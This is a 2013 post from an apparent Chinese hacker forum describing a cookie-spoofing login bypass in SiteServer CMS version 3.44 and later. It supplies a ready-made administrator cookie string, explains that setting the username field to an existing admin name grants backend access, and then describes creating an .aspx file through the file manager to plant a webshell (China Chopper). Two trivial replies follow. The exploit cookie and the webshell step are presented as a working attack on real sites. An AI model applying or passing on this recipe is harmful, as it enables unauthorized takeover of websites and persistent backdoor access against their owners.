搜索
查看: 392|回复: 2

SiteServer cms Cookie欺骗漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-9-16 11:57:02 来自手机 | 显示全部楼层 |阅读模式
简要描述:
.net平台的SiteServer cms他的功能强大是无庸置疑的,但问题也不少,
此次发现的cookis欺骗一枚 经测试,3.44以上版本通杀

详细说明:


1.本地搭建了一个环境 然后登陆抓取管理cookis

2.然后又删管理员 换帐号换密码清空cookis 在登陆的时候发现cookis的值就只有useradmin=admin

3.这个变化为当前的帐号 因此大胆判断 cookis应该是赋的固定值

BAIRONG.VC.ADMINLOGIN=6887; SITESERVER.ADMINISTRATOR.AUTH=0F7B10036E9FF94D33C4BE742E7D281E1BE923AEBB391E74FDB29EBCD0562DA027A340852E7CCAAAEAD4CA1EC30DF07E90A2CE42E5D862C84E1B06694F0C7A09788B7EE26000E7CBD14DE6AAE8E540BE403328B18792B24315DE96818A63D90CF8160F2DBCF97883216714E8AC81D63D0933DCBE; SITESERVER.ADMINISTRATOR.USERNAME=admin; lzstat_uv=28995594273945333853|677603;

然后测试 发现只要USERNAME=admin 目标站点里确实有管理员admin 就可进行cookis欺骗登入



随后连续测试了几个3.44版本 发现确实上述说的那样useraaname=管理员帐号 cookis里这条正确 就可欺骗登入

后台文件管理处不可上传aspx, 但在新建处,可任意创建 ,然后传马菜刀完事。
专业回帖 该用户已被删除
发表于 2013-9-16 12:03:23 | 显示全部楼层
这是什么东东啊
专业回帖 该用户已被删除
发表于 2013-9-16 15:19:30 | 显示全部楼层
帮帮顶顶!!
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表